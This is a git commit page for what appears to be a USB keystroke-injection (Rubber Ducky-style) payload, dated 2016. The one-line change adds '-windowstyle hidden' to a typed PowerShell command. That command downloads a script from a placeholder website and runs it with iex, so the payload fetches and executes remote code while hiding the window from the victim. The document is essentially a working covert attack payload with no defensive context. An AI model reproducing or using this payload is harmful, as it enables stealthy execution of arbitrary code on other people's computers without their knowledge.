Added -windowstyle hidden

This commit is contained in:
Keld Norman 2016-07-25 15:41:37 +02:00
parent 356aa8ccb2
commit ca2307763f
1 changed files with 1 additions and 1 deletions

View File

@ -13,7 +13,7 @@ GUI r
DELAY 50
STRING powershell iex (wget http://your-website.com/powershellscript.ps)
STRING powershell -windowstyle hidden iex (wget http://your-website.com/powershellscript.ps)
ENTER